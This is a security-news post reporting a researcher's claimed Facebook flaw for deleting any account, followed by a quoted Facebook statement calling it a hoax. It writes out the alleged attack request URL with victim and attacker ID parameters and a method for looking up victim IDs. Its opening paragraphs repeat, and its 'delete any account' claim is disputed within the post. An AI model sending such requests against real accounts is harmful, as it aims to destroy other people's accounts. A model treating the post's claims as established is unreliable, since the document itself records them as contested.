*Update: Security Engineer from Facebook told computerworld that this claim is fake one.
"This is simply a hoax. The html source shown in the video clearly says 'No test user was deleted'. We've verified in our logs that the victim account was manually deactivated by visiting https://www.facebook.com/deactivate.php. "
----
Speaking to E Hacking News, a Security researcher and Bug Hunter Ehraz Ahmed claimed to have found a security vulnerability that allows him to delete any Facebook account.
The researcher tried to report bug to Facebook. However , the Facebook team rejected the finding saying that it is not valid one.
Even though researcher sent a demo video, they denied his request.
Ehraz shared a method with EHN to exploit the bug
video Demo:
"This is simply a hoax. The html source shown in the video clearly says 'No test user was deleted'. We've verified in our logs that the victim account was manually deactivated by visiting https://www.facebook.com/deactivate.php. "
----
Speaking to E Hacking News, a Security researcher and Bug Hunter Ehraz Ahmed claimed to have found a security vulnerability that allows him to delete any Facebook account.
The researcher tried to report bug to Facebook. However , the Facebook team rejected the finding saying that it is not valid one.
Even though researcher sent a demo video, they denied his request.
Ehraz shared a method with EHN to exploit the bug
Exploit for removing any account from facebook
Vulnerable Link:
https://www.facebook.com/ajax/whitehat/delete_test_users.php?
fb_dtsg=AQA1E-WE&selected_users[0]=[Victems Profile ID]&__user=[Attackers Profile ID]&__a=1
We can get the profile id by using
http://graph.facebook.com/[username]
Here [username] indicates the username of your facebook profile!
In this Demo we will be using a test profile
Name: Rahul Agnikotri
https://www.facebook.com/hexgroup ( Victems profile) ( this is my test profile)
We can remove any account in facebook, including the celebrities.
Attackers profile id = 1781913563
Victems profile id = 100001831297334
Request to delete account
https://www.facebook.com/ajax/whitehat/delete_test_users.php?
fb_dtsg=AQA1E-WE&selected_users[0]=100001831297334&__user=1781913563&__a=1
video Demo:
I am just wondering how Facebook team rejected such a critical bug. However, this is not the first time Facebook team rejected the critical vulnerabilities. Most of times facebook team failed to understand the impact of the bug and later when the realize the severity , they fix the bug without acknowledging the researcher.
Recently , a hacker named "Khalil" posted the vulnerability report in mark zuckerberg wall after Facebook security team rejected the bug.